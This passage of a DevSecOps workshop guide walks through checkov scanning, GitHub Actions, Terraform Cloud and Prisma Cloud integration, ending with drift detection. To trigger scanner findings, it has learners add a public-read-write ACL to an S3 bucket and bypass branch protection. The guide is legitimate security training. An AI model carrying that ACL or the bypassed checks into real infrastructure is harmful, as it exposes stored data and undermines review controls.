 376 | ```
 377 | Add the above code to a new file within a new direcotry.
 378 | 
 379 | ```
 380 | mkdir custom-checks/
 381 | vim custom-checks/check.yaml
 382 | ```
 383 | >[!TIP]
 384 | > use `echo '$(file_contents)' > custom-checks/check.yaml` if formatting is an issue with vim.
 385 | 
 386 | 
 387 | Save the file. Then run checkov with the `--external-checks-dir` to test the custom policy.
 388 | 
 389 | ```
 390 | checkov -f simple_ec2.tf --external-checks-dir custom-checks
 391 | ```
 392 | ![](images/checkov-custom-checks.png)
 393 | 
 394 | **Challenge:** write a custom policy to check all resources for the presence of tags. Specifically, ensure that a tag named "Environment" exists.
 395 | 
 396 | 
 397 | ## IDE plugin
 398 | > [!NOTE]
 399 | > *Demo Only. Requires API key for Prisma Cloud.*
 400 | >
 401 | > Link to docs: [Prisma Cloud IDE plugins](https://docs.prismacloud.io/en/classic/appsec-admin-guide/get-started/connect-your-repositories/integrate-ide/integrate-ide)
 402 | >
 403 | > Link to docs: [VScode extension](https://marketplace.visualstudio.com/items?itemName=Bridgecrew.checkov)
 404 | 
 405 | Enabling checkov in an IDE provides real-time scan results and inline fix suggestions to developers as they create cloud infrastructure and applications.
 406 | 
 407 | ![](images/vscode-extension.png)
 408 | 
 409 | ![](images/vscode-ide1.png)
 410 | 
 411 | ![](images/vscode-ide2.png)
 412 | 
 413 | 
 414 | ## Integrate with GitHub Actions
 415 | Now that we are more familiar with some of checkov's basic functionality, let's see what it can do when integrated with other tools like GitHub Actions.
 416 | 
 417 | You can leverage GitHub Actions to run automated scans for every build or specific builds, such as the ones that merge into the master branch. This action can alert on misconfigurations, or block code from being merged if certain policies are violated. Results can also be sent to Prisma Cloud and other sources for further review and remediation steps.
 418 | 
 419 | Let's begin by setting an action from the repository page, under the `Actions` tab. Then click on `set up a workflow yourself ->` to create a new action from scratch.
 420 | 
 421 | 
 422 | <img src="images/gh-actions-new-workflow.png" width="800" height="300" /> 
 423 | 
 424 | Name the file `checkov.yaml` and add the following code snippet into the editor.
 425 | 
 426 | ```yaml
 427 | name: checkov
 428 | on:
 429 |   pull_request:
 430 |   push:
 431 |     branches:
 432 |       - main    
 433 | jobs:
 434 |   scan:
 435 |     runs-on: ubuntu-latest 
 436 |     permissions:
 437 |       contents: read # for actions/checkout to fetch code
 438 |       security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results
 439 |      
 440 |     steps:
 441 |     - uses: actions/checkout@v2
 442 |     
 443 |     - name: Run checkov 
 444 |       id: checkov
 445 |       uses: bridgecrewio/checkov-action@master
 446 |       with:
 447 |         directory: code/
 448 |         #soft_fail: true
 449 |         #api-key: ${{ secrets.BC_API_KEY }}
 450 |       #env:
 451 |         #PRISMA_API_URL: https://api4.prismacloud.io
 452 |         
 453 |     - name: Upload SARIF file
 454 |       uses: GitHub/codeql-action/upload-sarif@v3
 455 |       
 456 |       # Results are generated only on a success or failure
 457 |       # this is required since GitHub by default won't run the next step
 458 |       # when the previous one has failed. Alternatively, enable soft_fail in checkov action.
 459 |       if: success() || failure()
 460 |       with:
 461 |         sarif_file: results.sarif
 462 | ```
 463 | 
 464 | Once complete, click `Commit changes...` at the top right, then select `commit directly to the main branch` and click `Commit changes`.
 465 | 
 466 | ![](images/gh-action-edit.png)
 467 | 
 468 | 
 469 | Verify that the action is running (or has run) by navigating back to the `Actions` tab.
 470 | 
 471 | ![](images/gh-actions-workflows.png)
 472 | 
 473 | 
 474 | > **⍰  Question** 
 475 | >
 476 | > The action will result in a "Failure" (❌) on the first run, why does this happen?
 477 | 
 478 | 
 479 | View the results of the run by clicking on the `Create checkov.yaml` link.
 480 | 
 481 | ![](images/gh-actions-results.png)
 482 | 
 483 | Notice the policy violations that were seen earlier in CLI/Cloud9 are now displayed here. However, this is not the only place they are sent...
 484 | 
 485 | ## View results in GitHub Secuirty 
 486 | Checkov natively supports SARIF format and generates this output by default. GitHub Security accepts SARIF for uploading security issues. The GitHub Action created earlier handles the plumbing between the two.
 487 | 
 488 | 
 489 | Navigate to the `Security` tab in GitHub, the click `Code scanning` from the left sidebar or `View alerts` in the **Security overview > Code scanning alerts** section.
 490 | 
 491 | ![](images/ghas-overview.png)
 492 | 
 493 | The security issues found by checkov are surfaced here for developers to get actionable feedback on the codebase they are working in without having to leave the platform. 
 494 | 
 495 | ![](images/ghas-code-scanning-results.png)
 496 | 
 497 | 
 498 | > [!TIP]
 499 | > Code scanning alerts can be integrated into many other tools and workflows.
 500 | 
 501 | 
 502 | 
 503 | ## Tag and Trace with yor
 504 | [Yor](yor.io) is another open source tool that can be used for tagging and tracing IaC resources from code to cloud. For example, yor can be used to add git metadata and a unique hash to a terraform resource; this can be used to better manage resource lifecycles, improve change management, and ultimately to help tie code defintions to runtime configurations.
 505 | 
 506 | Create new file in the GitHub UI under the path `.github/workflows/yor.yaml`. 
 507 | 
 508 | ![](images/gh-new-file.png)
 509 | 
 510 | Add the following code snippet:
 511 | 
 512 | ```yaml
 513 | name: IaC tag and trace
 514 | 
 515 | on:
 516 |   push:
 517 |   pull_request:
 518 | 
 519 | jobs:
 520 |   yor:
 521 |     runs-on: ubuntu-latest
 522 |     permissions:
 523 |       contents: write
 524 |   
 525 |     steps:
 526 |       - uses: actions/checkout@v2
 527 |         name: Checkout repo
 528 |         with:
 529 |           fetch-depth: 0
 530 |       - name: Run yor action
 531 |         uses: bridgecrewio/yor-action@main
 532 | 
 533 | ```
 534 | 
 535 | This time, click `Commit changes...` at the top right, then select `Create a new branch` and click `Propose changes`. Click `Create pull request` on the next screen.
 536 | 
 537 | 
 538 | Check that the action is running, queued, or finished under the `Actions` tab.
 539 | 
 540 | More importanly, look at what yor updated by following the commit history and viewing any `.tf` file in the `code/` directory.
 541 | 
 542 | <img src="images/yor-tags.png" width="600" height="500" /> 
 543 | 
 544 | 
 545 | Notice the `yor_trace` tag? This can be used track "drift" between IaC definitons and runtime configurations.
 546 | 
 547 | ## Branch Protection Rules
 548 | Using Branch Protection Rules allows for criteria to be set in order for pushes and pull requests to be merged to a given branch. This can be set up to run checkov and block merges if there are any misconfigurations or vulnerabilities. 
 549 | 
 550 | Within GitHub, go to the `Settings` tab and navigate to `Branches` on the left sidebar, then click `Add branch protection rule`.
 551 | 
 552 | ![](images/gh-branch-protection.png)
 553 | 
 554 | Enter `main` as the `Branch name pattern`. Then select `Require status checks to pass before merging`, search for `checkov` in the provided search bar and select it as a required check. Leave the rest as default (unchecked), then click `Create`.
 555 | 
 556 | ![](images/gh-bp-rule.png)
 557 | 
 558 | 
 559 | 
 560 | ## BONUS: Pre-commit Hooks
 561 | Checkov can also be configured as a pre-commit hook. Read how to set up [here!](https://www.checkov.io/4.Integrations/pre-commit.html)
 562 | 
 563 | 
 564 | ## Integrate workflow with Terraform Cloud
 565 | Let's continue by integrating our GitHub repository with Terraform Cloud. We will then use Terraform Cloud to deploy IaC resource to AWS.
 566 | 
 567 | Navigate to [Terraform Cloud](app.terraform.io) and sign in / sign up. The community edition is all that is needed for this workshop.
 568 | 
 569 | Once logged in, follow the prompt to set up a new organization.
 570 | 
 571 | ![](images/tfc-welcome.png)
 572 | 
 573 | Enter an `Organization name` and provide your email address.
 574 | 
 575 | 
 576 | <img src="images/tfc-org-details.png" width="700" height="500" /> 
 577 | 
 578 | Create a workspace using the `Version Control Workflow` option.
 579 | 
 580 | ![](images/tfc-vcs-workflow.png)
 581 | 
 582 | Select `GitHub`, then `GitHub.com` from the dropdown. Authenticate and authorize the GitHub.
 583 | 
 584 | 
 585 | <img src="images/tfc-add-github.png" width="600" height="450" /> 
 586 | 
 587 | Choose the `prisma-cloud-devsecops-workshop` from the list of repositories.
 588 | 
 589 | ![](images/tfc-add-repo.png)
 590 | 
 591 | Add a `Workspace Name` and click `Advanced options`.
 592 | 
 593 | 
 594 | <img src="images/tfc-workspace1.png" width="500" height="600" /> 
 595 | 
 596 | In the `Terraform Working Directory` field, enter `/code/build/`. Select `Only trigger runs when files in specified paths change`.
 597 | 
 598 | 
 599 | <img src="images/tfc-workspace2.png" width="500" height="600" />
 600 | 
 601 | Leave the rest of the options as default and click `Create`.
 602 | 
 603 | <img src="images/tfc-workspace3.png" width="500" height="400" />
 604 | 
 605 | Almost done. In order to deploy resources to AWS, we need to provide Terraform Cloud with AWS credentials. We need to add our credentials as workspace variables. Click `Continue to workspace overview` to do continue. 
 606 | 
 607 | ![](images/tfc-workspace-created.png)
 608 | 
 609 | Click `Configure variables`
 610 | 
 611 | <img src="images/tfc-configure-variables.png" width="700" height="450" />
 612 | 
 613 | Add variables for `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`. Ensure you select `Environment variables` for both and that `AWS_SECRET_ACCESS_KEY` is marked as `Sensitive`.
 614 | 
 615 | ![](images/tfc-vars1.png)
 616 | 
 617 | Review the variables then return the your workspace overview when finished.
 618 | 
 619 | ![](images/tfc-vars2.png)
 620 | 
 621 | Terraform Cloud is now configured and our pipeline is ready to go. Let's test this out by submitting a pull request.
 622 | 
 623 | 
 624 | ## Block a Pull Request, Prevent a Deployment
 625 | We have now configured a GitHub repository to be scanned with checkov and to trigger Terraform Cloud to deploy infrastructure. Let's see how this works in action.
 626 | 
 627 | Create a new file in the GitHub UI under the path `code/build/s3.tf`. Enter the following code snippet into the new file. 
 628 | 
 629 | 
 630 | ```hcl
 631 | provider "aws" {
 632 |   region = "us-west-2"
 633 | }
 634 | 
 635 | resource "aws_s3_bucket" "dev_s3" {
 636 |   bucket_prefix = "dev-"
 637 | 
 638 |   tags = {
 639 |     Environment      = "Dev"
 640 |   }
 641 | }
 642 | 
 643 | resource "aws_s3_bucket_ownership_controls" "dev_s3" {
 644 |   bucket = aws_s3_bucket.dev_s3.id
 645 |   rule {
 646 |     object_ownership = "BucketOwnerPreferred"
 647 |   }
 648 | }
 649 | 
 650 | ```
 651 | 
 652 | Once complete, click `Commit changes...` at the top right, then select `Create a new branch and start a pull request` and click `Propose changes`.
 653 | 
 654 | ![](images/gh-pr.png)
 655 | 
 656 | At the next screen, review the diff then click `Create pull request`.
 657 | 
 658 | ![](images/gh-create-pr.png)
 659 | 
 660 | One more time... click  `Create pull request` to open the PR.
 661 | 
 662 | ![](images/gh-open-pr.png)
 663 | 
 664 | Wait for the checks to run. Then take note of the result: a blocked pull request!
 665 | 
 666 | ![](images/gh-blocked-pr.png)
 667 | 
 668 | Either bypass branch protections and `Merge pull request` or go back to the GitHub Action for checkov and uncomment the line with `--soft-fail=true`. This will require closing and reopening the pull request.
 669 | 
 670 | > **⍰  Question** 
 671 | >
 672 | > What other command options could be used to get the pipeline to pass?
 673 | 
 674 | 
 675 | ## Deploy to AWS
 676 | Navigate to Terraform Cloud and view the running plan.
 677 | 
 678 | ![](images/tfc-run-queued.png)
 679 | 
 680 | Once finished, click `Confirm & apply` to deploy the s3 bucket to AWS.
 681 | 
 682 | ![](images/tfc-apply.png)
 683 | 
 684 | Go to the S3 menu within AWS to view the bucket that has been deployed.
 685 | 
 686 | ![](images/aws-s3.png)
 687 | 
 688 | 
 689 | > **⍰  Question** 
 690 | >
 691 | > Given that we only supplied the s3 bucket with a prefix and not a specific bucket name, how can you tell which s3 bucket is the one *you* deployed?
 692 | 
 693 | > [!TIP]
 694 | > We used a tool to tag IaC resources...
 695 | 
 696 | 
 697 | Now let's see how we can leverage Prisma Cloud to make this all easier, gain more featues and scale security at ease.
 698 | 
 699 | ##
 700 | # Section 2: Application Security with Prisma Cloud
 701 | > [!NOTE]
 702 | > *This portion of the workshop is intended to be view-only. Those with existing access to Prisma Cloud can follow along but is not recommended to onboard any of the workshop content into a production deployment of Prisma Cloud. Use this guide as an example and the content within for demonstration purposes only.*
 703 | 
 704 | ## Welcome to Prisma Cloud
 705 | ![](images/prisma-welcome.png)
 706 | 
 707 | Prisma Cloud is a Cloud Native Application Protection Platform (CNAPP) comprised of three main pillars:
 708 | - Cloud Security
 709 | - Runtime Security
 710 | - Application Security
 711 | 
 712 | Across these three "modules", Prisma Cloud provides comprehensive security capabilities spanning code to cloud. This workshop will mainly focus on the Application Security module within the Prisma Cloud platform.
 713 | 
 714 | ## Onboard AWS Account
 715 | > [!NOTE]
 716 | > Link to docs: [Onboard AWS Account](https://docs.prismacloud.io/en/enterprise-edition/content-collections/connect/connect-cloud-accounts/onboard-aws/onboard-aws-account)
 717 | 
 718 | To begin securing resources running in the cloud, we need to configure Prisma Cloud to communitcate with a CSP. Let's do this by onboarding an AWS Account.
 719 | 
 720 | Navigate to **Settings > Providers > Connect Provider** and follow the instructions prompted by the conifguration wizard.
 721 | 
 722 | ![](images/prisma-cloud-account.png)
 723 | 
 724 | Select **Amazon Web Services**.
 725 | 
 726 | ![](images/prisma-csp-onboarding.png)
 727 | 
 728 | Choose **Account** for the scope, deselect **Agentless Workload Scanning**, leave the rest as default and click **Done**.
 729 | 
 730 | ![](images/prisma-aws1.png)
 731 | 
 732 | Provide your **Account ID** and enter an **Account Name**. Then click **Create IAM Role** to have Prisma Cloud auto-configure itself.
 733 | 
 734 | ![](images/prisma-aws2.png)
 735 | 
 736 | Scroll to the bottom of the AWS page that opens, click to **acknowledge** the disclaimer and then click **Create stack**.
 737 | 
 738 | ![](images/aws-create-stack.png)
 739 | 
 740 | Wait a moment while the stack is created, we need an output from the final result of the stack being deployed.
 741 | 
 742 | ![](images/prisma-cfn.png)
 743 | 
 744 | Once created, go to the **Outputs** tab and copy the value of ARN displayed.
 745 | 
 746 | ![](images/prisma-cfn-output.png)
 747 | 
 748 | Head back to Prisma Cloud and paste this value into the **IAM Role ARN** field, then click **Next**.
 749 | 
 750 | ![](images/prisma-aws3.png)
 751 | 
 752 | Wait for the connectivity test to run, review the status and click **Save and Close**.
 753 | 
 754 | ![](images/prisma-aws4.png)
 755 | 
 756 | View the onboarded cloud account under **Settings > Providers**.
 757 | 
 758 | ![](images/prisma-aws-added.png)
 759 | 
 760 | Prisma Cloud will now begin to scan the configured AWS Account for misconfigurations associated with deployed resources. Let the initial scan run in the background and we will come back to this in a later section.
 761 | 
 762 | ## Integrations and Providers
 763 | Prisma Cloud has a wide variety of built-in integrations to help operationalize within a cloud ecosystem.
 764 | 
 765 | Navigate to `Settings` at the top, then select `Providers` from the left sidebar. Click the `Connect Provider` button on the top right.
 766 | 
 767 | ![](images/prisma-code-build-providers.png)
 768 | 
 769 | Notice all of the different tools that can be integrated natively.
 770 | 
 771 | ![](images/prisma-connect-providers.png)
 772 | 
 773 | Let's start by integrating with checkov.
 774 | 
 775 | 
 776 | ## Checkov with API Key
 777 | > [!NOTE] 
 778 | > Link to docs: [Creating Access Keys for Prisma Cloud](https://docs.prismacloud.io/en/enterprise-edition/content-collections/administration/create-access-keys)
 779 | >
 780 | > Link to docs: [Add Checkov to Prisma Cloud](https://docs.prismacloud.io/en/classic/appsec-admin-guide/get-started/connect-your-repositories/ci-cd-runs/add-checkov)
 781 | 
 782 | To generate an API key, navigate to **Settings > Access Control**. Click the `Add` button and select `Access Key`.
 783 | 
 784 | ![](images/prisma-access-control.png)
 785 | 
 786 | Download the csv file containing the credentials then click `Done`.
 787 | 
 788 | <img src="images/prisma-create-access-key.png" width="400" height="300" />
 789 | 
 790 | 
 791 | 
 792 | ![](images/prisma-access-key-created.png) 
 793 | 
 794 | In a terminal window run checkov against the entire `code` directory, now with an API key. Use the following command:
 795 | 
 796 | > [!WARNING]
 797 | > Replace the `access_key_id`, `secret_key` and `prisma-api-url` with your values.
 798 | 
 799 | ```
 800 | checkov -d . --bc-api-key <access_key_id::<secret_key> --repo-id prisma/devsecops-workshop --prisma-api-url https://api4.prismacloud.io
 801 | ```
 802 | 
 803 | ![](images/c9-checkov-api-key.png)
 804 | 
 805 | Notice how the results now contain a severity. There are some other features that come with Prisma Cloud (using an API key) as well... 
 806 | 
 807 | Return back to Prisma Cloud to view the results that checkov surfaced in the platform. Navigate to **Application Security > Projects**.
 808 | 
 809 | ![](images/prisma-checkov-results.png)
 810 | 
 811 | Let's add this same API key to the GitHub Action created earlier. Within your GitHub repository, go to **Settings > Secrets and variables** then select **Actions**. 
 812 | 
 813 | ![](images/GitHub-secrets.png)
 814 | 
 815 | Click `New repository secret` then input the secret value of `<access_key_id>::<secret_key>` pair.
 816 | 
 817 | ![](images/github-repo-secret.png)
 818 | 
 819 | ![](images/github-create-secret.png)
 820 | 
 821 | Edit `checkov.yaml`, remove comments for `api-key` and `PRISMA_API_URL`.
 822 | 
 823 | ![](images/gh-edit-checkov.png)
 824 | 
 825 | Commit directly to main branch.
 826 | 
 827 | <img src="images/gh-commit-directly.png" width="375" height="400" />
 828 | 
 829 | Now check the results under **Security > Code scanning**. The same findings that displayed here earlier now with a **Severity** to sort and prioritze with.
 830 | 
 831 | ![](images/gh-security-results.png)
 832 | 
 833 | Return again to Prisma Cloud to view the results that were sent to the the platform.
 834 | 
 835 | ![](images/prisma-gha-results.png)
 836 | 
 837 | > [!TIP]
 838 | > You can use Prisma Cloud (checkov w/ an API key) to scan docker images for vulnerabilities! Use the `--docker-image` flag and point to an image name or ID.
 839 | 
 840 | ## Terraform Cloud Run Tasks
 841 | > [!NOTE] 
 842 | > Link to docs: [Connect Terraform Cloud - Run Tasks](https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/get-started/connect-code-and-build-providers/ci-cd-runs/add-terraform-run-tasks)
 843 | 
 844 | Let's now connect Prisma Cloud with Terraform Cloud using the Run Tasks integration. This allows for developers and platform teams to get immediate security feedback for every pipeline run. The Run Task integration will also surface results of every pipeline run to Prisma Cloud and the Security team.
 845 | 
 846 | First we need to create an API key in Terraform Cloud. Go to the Terraform Cloud console and navigate to **User Settings > Tokens** then click **Create an API Token**.
 847 | 
 848 | ![](images/tfc-create-token.png)
 849 | 
 850 | Name the token something meaningful, then click **Generate token**.
 851 | 
 852 | ![](images/tfc-token-created.png)
 853 | 
 854 | Copy the token and save the value somewhere safe. This will be provided to Prisma Cloud in the next step.
 855 | 
 856 | Go to the Prisma Cloud console and navigate to **Settings > Connect Provider > Code & Build Providers** to set up the integration.
 857 | 
 858 | ![](images/prisma-code-build-providers.png)
 859 | 
 860 | Under **CI/CD Runs**, choose **Terraform Cloud (Run Tasks)**.
 861 | 
 862 | <img src="images/prisma-tfc-rt.png" width="600" height="500" />
 863 | 
 864 | Enter the API token generated in Terraform Cloud and click **Next**.
 865 | 
 866 | <img src="images/prisma-tfc-token.png" width="600" height="500" />
 867 | 
 868 | Select your **Organization**.
 869 | 
 870 | <img src="images/prisma-tfc-org.png" width="600" height="500" />
 871 | 
 872 | Select your **Workspace** and choose the **Run Stage** in which you want Prisma Cloud to execute a scan. `Pre-plan` will scan HCL code, `Post-plan` will scan the Terraform plan.out file.
 873 | 
 874 | <img src="images/prisma-tfc-workspace.png" width="600" height="500" />
 875 | 
 876 | > **⍰  Question** 
 877 | >
 878 | > What are some advantages and/or limitations between scanning HCL files and scanning plan.out files?
 879 | 
 880 | Once completed, click **Done**.
 881 | 
 882 | <img src="images/prisma-tfc-done.png" width="600" height="500" />
 883 | 
 884 | Return back to Terraform Cloud to view the integration. Go to your **Workspace** and click **Settings > Run Tasks**. 
 885 | 
 886 | ![](images/tfc-run-task-created.png)
 887 | 
 888 | 
 889 | 
 890 | ## GitHub Application
 891 | > [!NOTE] 
 892 | > Link to docs: [Connect GitHub](https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/get-started/connect-code-and-build-providers/code-repositories/add-GitHub)
 893 | 
 894 | 
 895 | Next we will set up the Prisma Cloud GitHub Application which will perform easy-to-configure code scanning for GitHub repos.
 896 | 
 897 | Go to Prisma Cloud and create a new integration under **Settings > Connect Provider > Code & Build Providers**.
 898 | 
 899 | ![](images/prisma-code-build-providers.png)
 900 | 
 901 | Under **Code Repositories**, select **GitHub**. 
 902 | 
 903 | <img src="images/prisma-gh-app.png" width="600" height="500" />
 904 | 
 905 | Follow the install wizard and **Authorize** your GitHub account.
 906 | 
 907 | <img src="images/prisma-gh-auth.png" width="600" height="500" />
 908 | 
 909 | Select the repositories you would like to provide access to and click **Install & Authorize**.
 910 | 
 911 | <img src="images/gh-select-repos.png" width="400" height="700" />
 912 | 
 913 | Select the target repositories to scan now accessible from the Prisma Cloud wizard, then click **Next**.
 914 | 
 915 | <img src="images/prisma-select-repos.png" width="600" height="500" />
 916 | 
 917 | Click **Done** once completed. Navigate to **Settings > Providers > Repositories** to view the onboarded repo(s). 
 918 | 
 919 | ![](images/prisma-gh-done.png)
 920 | 
 921 | Also navigate to **Application Security > Projects** to view the results coming from the integration.
 922 | 
 923 | ![](images/prisma-gh-app-results.png)
 924 | 
 925 | ## Submit a Pull Request 2.0
 926 | 
 927 | Lets push a change to test the integration. Navigate to GitHub and make a change to the s3 resource deployed earlier under `code/build/s3.tf`.
 928 | 
 929 | 
 930 | 
 931 | 
 932 | Add the following line of code to the s3 resource definition. Then click **Commit changes...** once complete.
 933 | 
 934 | ```
 935 | acl = "public-read-write"
 936 | ```
 937 | 
 938 | ![](images/gh-edit-s3.png)
 939 | 
 940 | 
 941 | Create a new branch and click **Propose changes**.
 942 | 
 943 | <img src="images/gh-propose-changes.png" width="450" height="525" />
 944 | 
 945 | On the next page, review the diff then click **Create pull request**. Once gain, click **Create pull request** to open the pull request.
 946 | 
 947 | Let the checks run against the pull request. Prisma Cloud can review pull requests and will add comments with proposed changes to give developers actionable feedback within their VCS platform.
 948 | 
 949 | ![](images/gh-prisma-comments.png)
 950 | 
 951 | 
 952 |  When ready, click **Merge pull request** bypassing branch protection rules if still enabled.
 953 | 
 954 | 
 955 | Now that the change has been merged, navigate back to Terraform Cloud to view the pipeline running.
 956 | 
 957 | ![](images/tfc-plan-running.png)
 958 | 
 959 | 
 960 | Check the **Post-plan** stage and view the results of the Prisma Cloud scan.
 961 | 
 962 | ![](images/tfc-post-plan.png)
 963 | 
 964 | Leave this as is for now. We will soon fix the error and retrigger the pipeline.
 965 | 
 966 | 
 967 | ## View scan results in Prisma Cloud
 968 | Return to Prisma Cloud to view the results of all the scans that were just performed.
 969 | 
 970 | Navigate to **Application Security > Projects > Overview** to view findings for all scans. Filter the results with the **Repository** drop-down menu.
 971 | 
 972 | ![](images/prisma-appsec-projects.png)
 973 | 
 974 | View relevant CI/CD Risks **Application Security > CI/CD Risks**:
 975 | 
 976 | ![](images/prisma-cicd-risks.png)
 977 | 
 978 | Get a full SBOM analysis under **Application Security > SBOM**:
 979 | 
 980 | ![](images/prisma-sbom.png)
 981 | 
 982 | 
 983 | Take a look at **Dashboards > Code Security** to get top-level reports.
 984 | 
 985 | ![](images/prisma-dashboard-code.png)
 986 | 
 987 | Another useful view can be found under **Inventory > IaC Resources**
 988 | 
 989 | ![](images/prisma-inventory.png)
 990 | 
 991 | ## Enforcement Rules
 992 | 
 993 | The level of enforcement applied to each code scan can be controlled under **Settings > Configure > Application Security > Enforcement Rules**
 994 | 
 995 | ![](images/prisma-enforcement-rules.png)
 996 | 
 997 | These can be adjusted as a top-down policy or exceptions can be created for specific repositories / integrations.
 998 | 
 999 | ![](images/prisma-enforcement-rules1.png)
1000 | 
1001 | ![](images/prisma-enforcement-rules2.png)
1002 | 
1003 | ![](images/prisma-enforcement-rules3.png)
1004 | 
1005 | 
1006 | 
1007 | ## Issue a PR-Fix
1008 | Lets create a pull request from the Prisma Cloud console to apply a code fix. Navigate to **Application Security > Projects > Overview IaC Misconfiguration** then find the `dev_s3` bucket with the public access violations.
1009 | 
1010 | ![](images/prisma-pr-fix1.png)
1011 | 
1012 | Then click the **Submit** button in the top right to open a pull request.
1013 | 
1014 | ![](images/prisma-pr-fix2.png)
1015 | 
1016 | Navigate back to GitHub and check the **Pull request** tab to see the fix Prisma Cloud submitted.
1017 | 
1018 | ![](images/gh-pr-fix1.png)
1019 | 
1020 | Drill into the pull request and inspect the file changes under the **Files changes** tab. Notice the changes made to remediate the original policy violation.
1021 | 
1022 | ![](images/gh-pr-fix2.png)
1023 | 
1024 | Go back to the **Coversation** tab and click **Merge the pull request** at the bottom to check this code into the main branch.
1025 | 
1026 | ![](images/gh-merge-pr-fix.png)
1027 | 
1028 | Check Terraform Cloud to view the plan succesfully run. No need to apply this run as we will use the earlier deployment for our next example.
1029 | 
1030 | ![](images/tfc-pr-fix.png)
1031 | 
1032 | 
1033 | ## Drift Detection
1034 | > [!NOTE]
1035 | > Link to docs: [Setup Drift Detection](https://docs.prismacloud.io/en/classic/appsec-admin-guide/get-started/drift-detection)
1036 | 
1037 | In this final section, we will use the pipeline we built to detect drift. Drift occurs when infrastructure running in the cloud becomes configured differntly from what was originally defined in code.
1038 | 
1039 | This usually happens during a major incident, where DevOps and SRE teams make manual changes to quickly solve a problem, such as opening up ports to larger CIDR blocks or turning off HTTPS to find the problem. Sometimes lack of access and/or familiarity with IaC/CICD makes fixing an issue directly in the cloud easier than fixing in code and redeploying. If these aren’t reverted, they present security issues and it weakens the benefits of using IaC.
1040 | 
1041 | We will use the S3 bucket deployed earlier to simulate drift in a resource configuration.
1042 | 
1043 | > [!NOTE]
1044 | > By default Prisma Cloud performs full resource scans on an hourly interval. 
1045 | 
1046 | 
1047 | Let's first examine the policies associated with drift. Go to **Governance > Overview** and serach for `Traced resources are manually modified`. Notice the policies for each CSP. Ensure the policy for AWS is enabled.
1048 | 
1049 | ![](images/prisma-traced-resource-policies.png)
1050 | 
1051 | Next, go to the AWS Console under S3 buckets and add a new tag to the bucket created earlier.
1052 | 
1053 | ![](images/aws-s3-properties.png)
1054 | 
1055 | For example, add a tag with the key/value pair `drift` = `true` and click **Save changes**.
1056 | 
1057 | ![](images/aws-tag-drift.png)
1058 | 
1059 | On the next scan Prisma Cloud will detect this change and notify users that a resource configuration has changed from how it is defined in code. To view this, navigate to **Projects > IaC Misconfiguration** and filter for **Drift** under the **IaC Categories** dropdown menu.
1060 | 
1061 | ![](images/prisma-drift-result.png)
1062 | 
1063 | Prisma Cloud provides the option to revert the change via the same pull request mechanism we just performed which would trigger a pipeline run and patch the resource.
1064 | 
1065 | 
1066 | 
1067 | # Wrapping Up
1068 | Congrats! In this workshop, we didn’t just learn how to identify and automate fixing misconfigurations — we learned how to bridge the gaps between Development, DevOps, and Cloud Security. We are now equipped with full visibility, guardrails, and remediation capabilities across the development lifecycle. We also learned how important and easy it is to make security accessible to our engineering teams.
1069 | 
1070 | Try more of the integrations with other popular developer and DevOps tools. Share what you’ve found with other members of your team and show how easy it is to incorporate this into their development processes. 
1071 | 
1072 | You can also check out the [Prisma Cloud DevDay](https://register.paloaltonetworks.com/securitydevdays) to experience more of the platform in action.
1073 | 


--------------------------------------------------------------------------------
/guide/images/aws-create-stack.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/aws-create-stack.png


--------------------------------------------------------------------------------
/guide/images/aws-s3-properties.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/aws-s3-properties.png


--------------------------------------------------------------------------------
/guide/images/aws-s3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/aws-s3.png


--------------------------------------------------------------------------------
/guide/images/aws-tag-drift.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/aws-tag-drift.png


--------------------------------------------------------------------------------
/guide/images/c9-blank-shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-blank-shell.png


--------------------------------------------------------------------------------
/guide/images/c9-checkov-api-key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-checkov-api-key.png


--------------------------------------------------------------------------------
/guide/images/c9-checkov-d.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-checkov-d.png


--------------------------------------------------------------------------------
/guide/images/c9-checkov-list.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-checkov-list.png


--------------------------------------------------------------------------------
/guide/images/c9-checkov-options.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-checkov-options.png


--------------------------------------------------------------------------------
/guide/images/c9-close-welcome.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-close-welcome.png


--------------------------------------------------------------------------------
/guide/images/c9-console-home.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-console-home.png


--------------------------------------------------------------------------------
/guide/images/c9-create-env.png:
--------------------------------------------------------------------------------
